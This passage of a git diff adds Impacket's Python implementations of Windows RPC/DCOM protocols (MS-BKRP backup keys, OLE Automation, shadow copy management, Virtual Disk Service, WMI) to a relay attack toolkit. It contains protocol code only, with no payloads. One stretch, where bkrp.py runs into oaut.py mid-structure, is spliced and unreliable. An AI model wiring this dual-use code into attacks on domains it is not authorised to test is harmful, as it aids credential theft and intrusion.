maxJobId + return dce.request(netrJobDel) + +def hNetrJobEnum(dce, serverName = NULL, pEnumContainer = NULL, preferedMaximumLength = 0xffffffff): + netrJobEnum = NetrJobEnum() + netrJobEnum['ServerName'] = serverName + netrJobEnum['pEnumContainer']['Buffer'] = pEnumContainer + netrJobEnum['PreferedMaximumLength'] = preferedMaximumLength + return dce.request(netrJobEnum) + +def hNetrJobGetInfo(dce, serverName = NULL, jobId = 0): + netrJobGetInfo = NetrJobGetInfo() + netrJobGetInfo['ServerName'] = serverName + netrJobGetInfo['JobId'] = jobId + return dce.request(netrJobGetInfo) diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/bkrp.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/bkrp.py new file mode 100644 index 0000000..15a93bb --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/bkrp.py @@ -0,0 +1,127 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# +# Description: +# [MS-BKRP] Interface implementation +# +# Best way to learn how to use these calls is to grab the protocol standard +# so you understand what the call does, and then read the test case located +# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC +# +# Some calls have helper functions, which makes it even easier to use. +# They are located at the end of this file. +# Helper functions start with "h". +# There are test cases for them too. +# +# ToDo: +# [ ] 2.2.2 Client-Side-Wrapped Secret +from __future__ import division +from __future__ import print_function +from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray +from impacket.dcerpc.v5.dtypes import DWORD, NTSTATUS, GUID, RPC_SID, NULL +from impacket.dcerpc.v5.rpcrt import DCERPCException +from impacket import system_errors +from impacket.uuid import uuidtup_to_bin, string_to_bin +from impacket.structure import Structure + +MSRPC_UUID_BKRP = uuidtup_to_bin(('3dde7c30-165d-11d1-ab8f-00805f14db40', '1.0')) + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + key = self.error_code + if key in system_errors.ERROR_MESSAGES: + error_msg_short = system_errors.ERROR_MESSAGES[key][0] + error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] + return 'BKRP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'BKRP SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ + +BACKUPKEY_BACKUP_GUID = string_to_bin("7F752B10-178E-11D1-AB8F-00805F14DB40") +BACKUPKEY_RESTORE_GUID_WIN2K = string_to_bin("7FE94D50-178E-11D1-AB8F-00805F14DB40") +BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID = string_to_bin("018FF48A-EABA-40C6-8F6D-72370240E967") +BACKUPKEY_RESTORE_GUID = string_to_bin("47270C64-2FC7-499B-AC5B-0E37CDCE899A") + +################################################################################ +# STRUCTURES +################################################################################ +class BYTE_ARRAY(NDRUniConformantArray): + item = 'c' + +class PBYTE_ARRAY(NDRPOINTER): + referent = ( + ('Data', BYTE_ARRAY), + ) + +# 2.2.4.1 Rc4EncryptedPayload Structure +class Rc4EncryptedPayload(Structure): + structure = ( + ('R3', '32s=""'), + ('MAC', '20s=""'), + ('SID', ':', RPC_SID), + ('Secret', ':'), + ) + +# 2.2.4 Secret Wrapped with Symmetric Key +class WRAPPED_SECRET(Structure): + structure = ( + ('SIGNATURE', ' 0 THEN +# PRINT Name of the method is rgBstrNames[0] +# PRINT Parameters to above method are following +# FOR Y = 1 to pcNames -1 +# PRINT rgBstrNames[Y] +# END FOR +# END IF +# END FOR i +# ENDIF +def enumerateMethods(iInterface): + methods = dict() + typeInfoCount = iInterface.GetTypeInfoCount() + if typeInfoCount['pctinfo'] == 0: + LOG.error('Automation Server does not support type information for this object') + return {} + iTypeInfo = iInterface.GetTypeInfo() + iTypeAttr = iTypeInfo.GetTypeAttr() + for x in range(iTypeAttr['ppTypeAttr']['cFuncs']): + funcDesc = iTypeInfo.GetFuncDesc(x) + names = iTypeInfo.GetNames(funcDesc['ppFuncDesc']['memid'], 255) + print(names['rgBstrNames'][0]['asData']) + funcDesc.dump() + print('='*80) + if names['pcNames'] > 0: + name = names['rgBstrNames'][0]['asData'] + methods[name] = {} + for param in range(1, names['pcNames']): + methods[name][names['rgBstrNames'][param]['asData']] = '' + if funcDesc['ppFuncDesc']['elemdescFunc'] != NULL: + methods[name]['ret'] = funcDesc['ppFuncDesc']['elemdescFunc']['tdesc']['vt'] + + return methods + +def checkNullString(string): + if string == NULL: + return string + + if string[-1:] != '\x00': + return string + '\x00' + else: + return string + +class ITypeComp(IRemUnknown2): + def __init__(self, interface): + IRemUnknown2.__init__(self,interface) + self._iid = IID_ITypeComp + +class ITypeInfo(IRemUnknown2): + def __init__(self, interface): + IRemUnknown2.__init__(self,interface) + self._iid = IID_ITypeInfo + + def GetTypeAttr(self): + request = ITypeInfo_GetTypeAttr() + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp + + def GetTypeComp(self): + request = ITypeInfo_GetTypeComp() + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return ITypeComp(INTERFACE(self.get_cinstance(), ''.join(resp['ppTComp']['abData']), self.get_ipidRemUnknown(), target = self.get_target())) + + def GetFuncDesc(self, index): + request = ITypeInfo_GetFuncDesc() + request['index'] = index + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp + + def GetNames(self, memid, cMaxNames=10): + request = ITypeInfo_GetNames() + request['memid'] = memid + request['cMaxNames'] = cMaxNames + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp + + def GetDocumentation(self, memid, refPtrFlags=15): + request = ITypeInfo_GetDocumentation() + request['memid'] = memid + request['refPtrFlags'] = refPtrFlags + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp + + +class IDispatch(IRemUnknown2): + def __init__(self, interface): + IRemUnknown2.__init__(self,interface) + self._iid = IID_IDispatch + + def GetTypeInfoCount(self): + request = IDispatch_GetTypeInfoCount() + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp + + def GetTypeInfo(self): + request = IDispatch_GetTypeInfo() + request['iTInfo'] = 0 + request['lcid'] = 0 + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return ITypeInfo(INTERFACE(self.get_cinstance(), ''.join(resp['ppTInfo']['abData']), self.get_ipidRemUnknown(), target = self.get_target())) + + def GetIDsOfNames(self, rgszNames, lcid = 0): + request = IDispatch_GetIDsOfNames() + request['riid'] = IID_NULL + for name in rgszNames: + tmpName = LPOLESTR() + tmpName['Data'] = checkNullString(name) + request['rgszNames'].append(tmpName) + request['cNames'] = len(rgszNames) + request['lcid'] = lcid + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + IDs = list() + for id in resp['rgDispId']: + IDs.append(id) + + return IDs + + def Invoke(self, dispIdMember, lcid, dwFlags, pDispParams, cVarRef, rgVarRefIdx, rgVarRef): + request = IDispatch_Invoke() + request['dispIdMember'] = dispIdMember + request['riid'] = IID_NULL + request['lcid'] = lcid + request['dwFlags'] = dwFlags + request['pDispParams'] = pDispParams + request['cVarRef'] = cVarRef + request['rgVarRefIdx'] = rgVarRefIdx + request['rgVarRef'] = rgVarRefIdx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/scmp.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/scmp.py new file mode 100644 index 0000000..752235c --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/scmp.py @@ -0,0 +1,337 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# +# Description: +# [MS-SCMP]: Shadow Copy Management Protocol Interface implementation +# This was used as a way to test the DCOM runtime. Further +# testing is needed to verify it is working as expected +# +# Best way to learn how to use these calls is to grab the protocol standard +# so you understand what the call does, and then read the test case located +# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC +# +# Since DCOM is like an OO RPC, instead of helper functions you will see the +# classes described in the standards developed. +# There are test cases for them too. +# +from __future__ import division +from __future__ import print_function +from impacket.dcerpc.v5.ndr import NDRENUM, NDRSTRUCT, NDRUNION +from impacket.dcerpc.v5.dcomrt import PMInterfacePointer, INTERFACE, DCOMCALL, DCOMANSWER, IRemUnknown2 +from impacket.dcerpc.v5.dtypes import LONG, LONGLONG, ULONG, WSTR +from impacket.dcerpc.v5.enum import Enum +from impacket.dcerpc.v5.rpcrt import DCERPCException +from impacket import hresult_errors +from impacket.uuid import string_to_bin + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + if self.error_code in hresult_errors.ERROR_MESSAGES: + error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0] + error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] + return 'SCMP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'SCMP SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ +# 1.9 Standards Assignments +CLSID_ShadowCopyProvider = string_to_bin('0b5a2c52-3eb9-470a-96e2-6c6d4570e40f') +IID_IVssSnapshotMgmt = string_to_bin('FA7DF749-66E7-4986-A27F-E2F04AE53772') +IID_IVssEnumObject = string_to_bin('AE1C7110-2F60-11d3-8A39-00C04F72D8E3') +IID_IVssDifferentialSoftwareSnapshotMgmt = string_to_bin('214A0F28-B737-4026-B847-4F9E37D79529') +IID_IVssEnumMgmtObject = string_to_bin('01954E6B-9254-4e6e-808C-C9E05D007696') +IID_ShadowCopyProvider = string_to_bin('B5946137-7B9F-4925-AF80-51ABD60B20D5') + +# 2.2.1.1 VSS_ID +class VSS_ID(NDRSTRUCT): + structure = ( + ('Data','16s=b""'), + ) + + def getAlignment(self): + return 2 + +#2.2.1.2 VSS_PWSZ +VSS_PWSZ = WSTR + +# 2.2.1.3 VSS_TIMESTAMP +VSS_TIMESTAMP = LONGLONG + +error_status_t = LONG +################################################################################ +# STRUCTURES +################################################################################ +# 2.2.2.1 VSS_OBJECT_TYPE Enumeration +class VSS_OBJECT_TYPE(NDRENUM): + class enumItems(Enum): + VSS_OBJECT_UNKNOWN = 0 + VSS_OBJECT_NONE = 1 + VSS_OBJECT_SNAPSHOT_SET = 2 + VSS_OBJECT_SNAPSHOT = 3 + VSS_OBJECT_PROVIDER = 4 + VSS_OBJECT_TYPE_COUNT = 5 + +# 2.2.2.2 VSS_MGMT_OBJECT_TYPE Enumeration +class VSS_MGMT_OBJECT_TYPE(NDRENUM): + class enumItems(Enum): + VSS_MGMT_OBJECT_UNKNOWN = 0 + VSS_MGMT_OBJECT_VOLUME = 1 + VSS_MGMT_OBJECT_DIFF_VOLUME = 2 + VSS_MGMT_OBJECT_DIFF_AREA = 3 + +# 2.2.2.3 VSS_VOLUME_SNAPSHOT_ATTRIBUTES Enumeration +class VSS_VOLUME_SNAPSHOT_ATTRIBUTES(NDRENUM): + class enumItems(Enum): + VSS_VOLSNAP_ATTR_PERSISTENT = 0x01 + VSS_VOLSNAP_ATTR_NO_AUTORECOVERY = 0x02 + VSS_VOLSNAP_ATTR_CLIENT_ACCESSIBLE = 0x04 + VSS_VOLSNAP_ATTR_NO_AUTO_RELEASE = 0x08 + VSS_VOLSNAP_ATTR_NO_WRITERS = 0x10 + +# 2.2.2.4 VSS_SNAPSHOT_STATE Enumeration +class VSS_SNAPSHOT_STATE(NDRENUM): + class enumItems(Enum): + VSS_SS_UNKNOWN = 0x01 + VSS_SS_CREATED = 0x0c + +# 2.2.2.5 VSS_PROVIDER_TYPE Enumeration +class VSS_PROVIDER_TYPE(NDRENUM): + class enumItems(Enum): + VSS_PROV_UNKNOWN = 0 + +# 2.2.3.7 VSS_VOLUME_PROP Structure +class VSS_VOLUME_PROP(NDRSTRUCT): + structure = ( + ('m_pwszVolumeName', VSS_PWSZ), + ('m_pwszVolumeDisplayName', VSS_PWSZ), + ) + +# 2.2.3.5 VSS_MGMT_OBJECT_UNION Union +class VSS_MGMT_OBJECT_UNION(NDRUNION): + commonHdr = ( + ('tag', ULONG), + ) + union = { + VSS_MGMT_OBJECT_TYPE.VSS_MGMT_OBJECT_VOLUME: ('Vol', VSS_VOLUME_PROP), + #VSS_MGMT_OBJECT_DIFF_VOLUME: ('DiffVol', VSS_DIFF_VOLUME_PROP), + #VSS_MGMT_OBJECT_DIFF_AREA: ('DiffArea', VSS_DIFF_AREA_PROP), + } + +# 2.2.3.6 VSS_MGMT_OBJECT_PROP Structure +class VSS_MGMT_OBJECT_PROP(NDRSTRUCT): + structure = ( + ('Type', VSS_MGMT_OBJECT_TYPE), + ('Obj', VSS_MGMT_OBJECT_UNION), + ) + +################################################################################ +# RPC CALLS +################################################################################ +# 3.1.3 IVssEnumMgmtObject Details + +# 3.1.3.1 Next (Opnum 3) +class IVssEnumMgmtObject_Next(DCOMCALL): + opnum = 3 + structure = ( + ('celt', ULONG), + ) + +class IVssEnumMgmtObject_NextResponse(DCOMANSWER): + structure = ( + ('rgelt', VSS_MGMT_OBJECT_PROP), + ('pceltFetched', ULONG), + ('ErrorCode', error_status_t), + ) + +# 3.1.2.1 Next (Opnum 3) +class IVssEnumObject_Next(DCOMCALL): + opnum = 3 + structure = ( + ('celt', ULONG), + ) + +class IVssEnumObject_NextResponse(DCOMANSWER): + structure = ( + ('rgelt', VSS_MGMT_OBJECT_PROP), + ('pceltFetched', ULONG), + ('ErrorCode', error_status_t), + ) + +class GetProviderMgmtInterface(DCOMCALL): + opnum = 3 + structure = ( + ('ProviderId', VSS_ID), + ('InterfaceId', VSS_ID), + ) + +class GetProviderMgmtInterfaceResponse(DCOMANSWER): + structure = ( + ('ppItf', PMInterfacePointer), + ('ErrorCode', error_status_t), + ) + +class QueryVolumesSupportedForSnapshots(DCOMCALL): + opnum = 4 + structure = ( + ('ProviderId', VSS_ID), + ('IContext', LONG), + ) + +class QueryVolumesSupportedForSnapshotsResponse(DCOMANSWER): + structure = ( + ('ppEnum', PMInterfacePointer), + ('ErrorCode', error_status_t), + ) + +class QuerySnapshotsByVolume(DCOMCALL): + opnum = 5 + structure = ( + ('pwszVolumeName', VSS_PWSZ), + ('ProviderId', VSS_ID), + ) + +class QuerySnapshotsByVolumeResponse(DCOMANSWER): + structure = ( + ('ppEnum', PMInterfacePointer), + ('ErrorCode', error_status_t), + ) + +# 3.1.4.4.5 QueryDiffAreasForVolume (Opnum 6) +class QueryDiffAreasForVolume(DCOMCALL): + opnum = 6 + structure = ( + ('pwszVolumeName', VSS_PWSZ), + ) + +class QueryDiffAreasForVolumeResponse(DCOMANSWER): + structure = ( + ('ppEnum', PMInterfacePointer), + ('ErrorCode', error_status_t), + ) + +# 3.1.4.4.6 QueryDiffAreasOnVolume (Opnum 7) +class QueryDiffAreasOnVolume(DCOMCALL): + opnum = 7 + structure = ( + ('pwszVolumeName', VSS_PWSZ), + ) + +class QueryDiffAreasOnVolumeResponse(DCOMANSWER): + structure = ( + ('ppEnum', PMInterfacePointer), + ('ErrorCode', error_status_t), + ) + + +################################################################################ +# OPNUMs and their corresponding structures +################################################################################ +OPNUMS = { +} + +################################################################################ +# HELPER FUNCTIONS AND INTERFACES +################################################################################ +class IVssEnumMgmtObject(IRemUnknown2): + def __init__(self, interface): + IRemUnknown2.__init__(self, interface) + self._iid = IID_IVssEnumMgmtObject + + def Next(self, celt): + request = IVssEnumMgmtObject_Next() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + request['celt'] = celt + resp = self.request(request, self._iid, uuid = self.get_iPid()) + return resp + +class IVssEnumObject(IRemUnknown2): + def __init__(self, interface): + IRemUnknown2.__init__(self, interface) + self._iid = IID_IVssEnumObject + + def Next(self, celt): + request = IVssEnumObject_Next() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + request['celt'] = celt + dce = self.connect() + resp = dce.request(request, self._iid, uuid = self.get_iPid()) + return resp + +class IVssSnapshotMgmt(IRemUnknown2): + def __init__(self, interface): + IRemUnknown2.__init__(self, interface) + self._iid = IID_IVssSnapshotMgmt + + def GetProviderMgmtInterface(self, providerId = IID_ShadowCopyProvider, interfaceId = IID_IVssDifferentialSoftwareSnapshotMgmt): + req = GetProviderMgmtInterface() + classInstance = self.get_cinstance() + req['ORPCthis'] = classInstance.get_ORPCthis() + req['ORPCthis']['flags'] = 0 + req['ProviderId'] = providerId + req['InterfaceId'] = interfaceId + resp = self.request(req, self._iid, uuid = self.get_iPid()) + return IVssDifferentialSoftwareSnapshotMgmt(INTERFACE(classInstance, ''.join(resp['ppItf']['abData']), self.get_ipidRemUnknown(), target = self.get_target())) + + def QueryVolumesSupportedForSnapshots(self, providerId, iContext): + req = QueryVolumesSupportedForSnapshots() + classInstance = self.get_cinstance() + req['ORPCthis'] = classInstance.get_ORPCthis() + req['ORPCthis']['flags'] = 0 + req['ProviderId'] = providerId + req['IContext'] = iContext + resp = self.request(req, self._iid, uuid = self.get_iPid()) + return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),target = self.get_target())) + + def QuerySnapshotsByVolume(self, volumeName, providerId = IID_ShadowCopyProvider): + req = QuerySnapshotsByVolume() + classInstance = self.get_cinstance() + req['ORPCthis'] = classInstance.get_ORPCthis() + req['ORPCthis']['flags'] = 0 + req['pwszVolumeName'] = volumeName + req['ProviderId'] = providerId + try: + resp = self.request(req, self._iid, uuid = self.get_iPid()) + except DCERPCException as e: + print(e) + from impacket.winregistry import hexdump + data = e.get_packet() + hexdump(data) + kk = QuerySnapshotsByVolumeResponse(data) + kk.dump() + #resp.dump() + return IVssEnumObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target())) + +class IVssDifferentialSoftwareSnapshotMgmt(IRemUnknown2): + def __init__(self, interface): + IRemUnknown2.__init__(self, interface) + self._iid = IID_IVssDifferentialSoftwareSnapshotMgmt + + def QueryDiffAreasOnVolume(self, pwszVolumeName): + req = QueryDiffAreasOnVolume() + classInstance = self.get_cinstance() + req['ORPCthis'] = classInstance.get_ORPCthis() + req['ORPCthis']['flags'] = 0 + req['pwszVolumeName'] = pwszVolumeName + resp = self.request(req, self._iid, uuid = self.get_iPid()) + return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target())) + + def QueryDiffAreasForVolume(self, pwszVolumeName): + req = QueryDiffAreasForVolume() + classInstance = self.get_cinstance() + req['ORPCthis'] = classInstance.get_ORPCthis() + req['ORPCthis']['flags'] = 0 + req['pwszVolumeName'] = pwszVolumeName + resp = self.request(req, self._iid, uuid = self.get_iPid()) + return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target())) diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/vds.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/vds.py new file mode 100644 index 0000000..0e46797 --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/vds.py @@ -0,0 +1,267 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# +# Description: +# [MS-VDS]: Virtual Disk Service (VDS) Protocol +# This was used as a way to test the DCOM runtime. Further +# testing is needed to verify it is working as expected +# +# Best way to learn how to use these calls is to grab the protocol standard +# so you understand what the call does, and then read the test case located +# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC +# +# Since DCOM is like an OO RPC, instead of helper functions you will see the +# classes described in the standards developed. +# There are test cases for them too. +# +from __future__ import division +from __future__ import print_function +from impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantVaryingArray, NDRENUM +from impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown2, PMInterfacePointer, INTERFACE +from impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, DWORD, SHORT, GUID +from impacket.dcerpc.v5.rpcrt import DCERPCException +from impacket.dcerpc.v5.enum import Enum +from impacket import hresult_errors +from impacket.uuid import string_to_bin + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + if self.error_code in hresult_errors.ERROR_MESSAGES: + error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0] + error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] + return 'VDS SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'VDS SessionError: unknown error code: 0x%x' % (self.error_code) + +################################################################################ +# CONSTANTS +################################################################################ +# 1.9 Standards Assignments +CLSID_VirtualDiskService = string_to_bin('7D1933CB-86F6-4A98-8628-01BE94C9A575') +IID_IEnumVdsObject = string_to_bin('118610B7-8D94-4030-B5B8-500889788E4E') +IID_IVdsAdviseSink = string_to_bin('8326CD1D-CF59-4936-B786-5EFC08798E25') +IID_IVdsAsync = string_to_bin('D5D23B6D-5A55-4492-9889-397A3C2D2DBC') +IID_IVdsServiceInitialization = string_to_bin('4AFC3636-DB01-4052-80C3-03BBCB8D3C69') +IID_IVdsService = string_to_bin('0818A8EF-9BA9-40D8-A6F9-E22833CC771E') +IID_IVdsSwProvider = string_to_bin('9AA58360-CE33-4F92-B658-ED24B14425B8') +IID_IVdsProvider = string_to_bin('10C5E575-7984-4E81-A56B-431F5F92AE42') + +error_status_t = ULONG + +# 2.2.1.1.3 VDS_OBJECT_ID +VDS_OBJECT_ID = GUID + +################################################################################ +# STRUCTURES +################################################################################ +# 2.2.2.1.3.1 VDS_SERVICE_PROP +class VDS_SERVICE_PROP(NDRSTRUCT): + structure = ( + ('pwszVersion',LPWSTR), + ('ulFlags',ULONG), + ) + +class OBJECT_ARRAY(NDRUniConformantVaryingArray): + item = PMInterfacePointer + +# 2.2.2.7.1.1 VDS_PROVIDER_TYPE +class VDS_PROVIDER_TYPE(NDRENUM): + class enumItems(Enum): + VDS_PT_UNKNOWN = 0 + VDS_PT_SOFTWARE = 1 + VDS_PT_HARDWARE = 2 + VDS_PT_VIRTUALDISK = 3 + VDS_PT_MAX = 4 + +# 2.2.2.7.2.1 VDS_PROVIDER_PROP +class VDS_PROVIDER_PROP(NDRSTRUCT): + structure = ( + ('id',VDS_OBJECT_ID), + ('pwszName',LPWSTR), + ('guidVersionId',GUID), + ('pwszVersion',LPWSTR), + ('type',VDS_PROVIDER_TYPE), + ('ulFlags',ULONG), + ('ulStripeSizeFlags',ULONG), + ('sRebuildPriority',SHORT), + ) + +################################################################################ +# RPC CALLS +################################################################################ + +# 3.4.5.2.5.1 IVdsServiceInitialization::Initialize (Opnum 3) +class IVdsServiceInitialization_Initialize(DCOMCALL): + opnum = 3 + structure = ( + ('pwszMachineName', LPWSTR), + ) + +class IVdsServiceInitialization_InitializeResponse(DCOMANSWER): + structure = ( + ('ErrorCode', error_status_t), + ) + +# 3.4.5.2.4.1 IVdsService::IsServiceReady (Opnum 3) +class IVdsService_IsServiceReady(DCOMCALL): + opnum = 3 + structure = ( + ) + +class IVdsService_IsServiceReadyResponse(DCOMANSWER): + structure = ( + ('ErrorCode', error_status_t), + ) + +# 3.4.5.2.4.2 IVdsService::WaitForServiceReady (Opnum 4) +class IVdsService_WaitForServiceReady(DCOMCALL): + opnum = 4 + structure = ( + ) + +class IVdsService_WaitForServiceReadyResponse(DCOMANSWER): + structure = ( + ('ErrorCode', error_status_t), + ) + +# 3.4.5.2.4.3 IVdsService::GetProperties (Opnum 5) +class IVdsService_GetProperties(DCOMCALL): + opnum = 5 + structure = ( + ) + +class IVdsService_GetPropertiesResponse(DCOMANSWER): + structure = ( + ('pServiceProp', VDS_SERVICE_PROP), + ('ErrorCode', error_status_t), + ) + +# 3.4.5.2.4.4 IVdsService::QueryProviders (Opnum 6) +class IVdsService_QueryProviders(DCOMCALL): + opnum = 6 + structure = ( + ('masks', DWORD), + ) + +class IVdsService_QueryProvidersResponse(DCOMANSWER): + structure = ( + ('ppEnum', PMInterfacePointer), + ('ErrorCode', error_status_t), + ) + +# 3.1.1.1 IEnumVdsObject Interface +# 3.4.5.2.1.1 IEnumVdsObject::Next (Opnum 3) +class IEnumVdsObject_Next(DCOMCALL): + opnum = 3 + structure = ( + ('celt', ULONG), + ) + +class IEnumVdsObject_NextResponse(DCOMANSWER): + structure = ( + ('ppObjectArray', OBJECT_ARRAY), + ('pcFetched', ULONG), + ('ErrorCode', error_status_t), + ) +# 3.4.5.2.14.1 IVdsProvider::GetProperties (Opnum 3) +class IVdsProvider_GetProperties(DCOMCALL): + opnum = 3 + structure = ( + ) + +class IVdsProvider_GetPropertiesResponse(DCOMANSWER): + structure = ( + ('pProviderProp', VDS_PROVIDER_PROP), + ('ErrorCode', error_status_t), + ) + +################################################################################ +# OPNUMs and their corresponding structures +################################################################################ +OPNUMS = { +} + +################################################################################ +# HELPER FUNCTIONS AND INTERFACES +################################################################################ +class IEnumVdsObject(IRemUnknown2): + def Next(self, celt=0xffff): + request = IEnumVdsObject_Next() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + request['celt'] = celt + try: + resp = self.request(request, uuid = self.get_iPid()) + except Exception as e: + resp = e.get_packet() + # If it is S_FALSE(1) means less items were returned + if resp['ErrorCode'] != 1: + raise + interfaces = list() + for interface in resp['ppObjectArray']: + interfaces.append(IRemUnknown2(INTERFACE(self.get_cinstance(), ''.join(interface['abData']), self.get_ipidRemUnknown(), target = self.get_target()))) + return interfaces + +class IVdsProvider(IRemUnknown2): + def GetProperties(self): + request = IVdsProvider_GetProperties() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + resp = self.request(request, uuid = self.get_iPid()) + return resp + +class IVdsServiceInitialization(IRemUnknown2): + def __init__(self, interface): + IRemUnknown2.__init__(self, interface) + + def Initialize(self): + request = IVdsServiceInitialization_Initialize() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + request['pwszMachineName'] = '\x00' + resp = self.request(request, uuid = self.get_iPid()) + return resp + +class IVdsService(IRemUnknown2): + def __init__(self, interface): + IRemUnknown2.__init__(self, interface) + + def IsServiceReady(self): + request = IVdsService_IsServiceReady() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + try: + resp = self.request(request, uuid = self.get_iPid()) + except Exception as e: + resp = e.get_packet() + return resp + + def WaitForServiceReady(self): + request = IVdsService_WaitForServiceReady() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + resp = self.request(request, uuid = self.get_iPid()) + return resp + + def GetProperties(self): + request = IVdsService_GetProperties() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + resp = self.request(request, uuid = self.get_iPid()) + return resp + + def QueryProviders(self, masks): + request = IVdsService_QueryProviders() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + request['masks'] = masks + resp = self.request(request, uuid = self.get_iPid()) + return IEnumVdsObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target())) diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/wmi.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/wmi.py new file mode 100644 index 0000000..c8affc3 --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/wmi.py @@ -0,0 +1,3250 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# +# Description: +# [MS-WMI]/[MS-WMIO] : Windows Management Instrumentation Remote Protocol. Partial implementation +# +# Best way to learn how to use these calls is to grab the protocol standard +# so you understand what the call does, and then read the test case located +# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC +# +# Since DCOM is like an OO RPC, instead of helper functions you will see the +# classes described in the standards developed. +# There are test cases for them too. +# +from __future__ import division +from __future__ import print_function +from struct import unpack, calcsize, pack +from functools import partial +import collections +import logging + +from impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantArray, NDRPOINTER, NDRUniConformantVaryingArray, NDRUNION, \ + NDRENUM +from impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown, PMInterfacePointer, INTERFACE, \ + PMInterfacePointer_ARRAY, BYTE_ARRAY, PPMInterfacePointer, OBJREF_CUSTOM +from impacket.dcerpc.v5.dcom.oaut import BSTR +from impacket.dcerpc.v5.dtypes import ULONG, DWORD, NULL, LPWSTR, LONG, HRESULT, PGUID, LPCSTR, 